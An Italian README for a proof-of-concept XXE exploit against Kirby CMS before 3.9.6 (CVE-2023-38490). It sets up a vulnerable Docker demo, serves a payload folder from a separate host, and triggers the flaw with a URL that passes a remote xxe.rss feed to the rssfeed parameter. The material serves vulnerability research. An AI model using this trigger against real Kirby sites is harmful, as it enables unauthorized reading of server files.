
Kirby < 3.9.6 exploit di entità esterna XML
Kirby < 3.9.6 Entità Esterna XML
Exploit per CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Build ed esegui l'app demo vulnerabile:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Servi il payload di esempio:
Nota: scegli un indirizzo di bind a cui il container docker possa accedere.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Attiva l'exploit:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
La funzione vulnerabile è presente in Kirby Core ma non è utilizzata per impostazione predefinita in Kirby Core, Kirby StarterKit o Kirby PlainKit. Ciò significa che la vulnerabilità non ti riguarderà nella configurazione predefinita, ma potrebbe essere introdotta con sviluppo personalizzato o installando un plugin che utilizza il toolkit interessato.
ACCEIS non promuove né incoraggia alcuna attività illegale, tutto il contenuto fornito da questo repository è destinato esclusivamente a scopi di ricerca, educazione e rilevamento delle minacce.